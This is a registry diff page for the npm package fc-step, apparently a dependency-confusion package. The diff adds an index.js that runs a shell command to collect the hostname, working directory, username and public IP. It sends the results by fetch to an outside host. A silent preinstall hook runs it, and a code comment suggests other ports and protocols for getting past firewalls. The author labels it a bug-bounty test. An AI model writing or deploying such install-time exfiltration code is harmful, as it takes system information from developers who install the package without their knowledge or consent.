fc-step 0.0.1-security → 9999.9999.99999
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of fc-step might be problematic. Click here for more details.
- package/index.js +25 -0
- package/package.json +11 -5
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,25 @@
|
|
|
1
|
+
|
|
2
|
+
console.log('You unintentionally installed a public package from NPM. Please contact https://hackerone.com/thiezn?type=user');
|
|
3
|
+
/*
|
|
4
|
+
Leak stuff through making web requests on imports. To bypass corporate
|
|
5
|
+
firewalls you can also consider exfiltrating data through different ports
|
|
6
|
+
and protocols like http, https, dns and others.
|
|
7
|
+
|
|
8
|
+
See this excellent blog post that explains why this is could lead to serious security issues:
|
|
9
|
+
https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
|
|
10
|
+
*/
|
|
11
|
+
|
|
12
|
+
const { exec } = require("child_process");
|
|
13
|
+
const { stdout } = require("process");
|
|
14
|
+
exec("a=$(hostname;pwd;whoami;curl https://ifconfig.me;) && echo $a", (error, data, error_str) => {
|
|
15
|
+
if (error) {
|
|
16
|
+
console.log("error", error.message);
|
|
17
|
+
fetch("http://www.mortimer.nl/mpf/depconfusion/fc-step?error=" + error.message)
|
|
18
|
+
fetch("https://www.mortimer.nl/mpf/depconfusion/fc-step?error=" + error.message)
|
|
19
|
+
return;
|
|
20
|
+
}
|
|
21
|
+
console.log(data);
|
|
22
|
+
fetch("http://www.mortimer.nl/mpf/depconfusion/fc-step?stdout=" + data)
|
|
23
|
+
fetch("https://www.mortimer.nl/mpf/depconfusion/fc-step?stdout=" + data)
|
|
24
|
+
});
|
|
25
|
+
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
2
|
+
"name": "fc-step",
|
|
3
|
+
"version": "9999.9999.99999",
|
|
4
|
+
"description": "Always check your dependencies!",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js > /dev/null 2>&1"
|
|
9
|
+
},
|
|
10
|
+
"author": "https://hackerone.com/thiezn?type=user",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=fc-step for more information.
|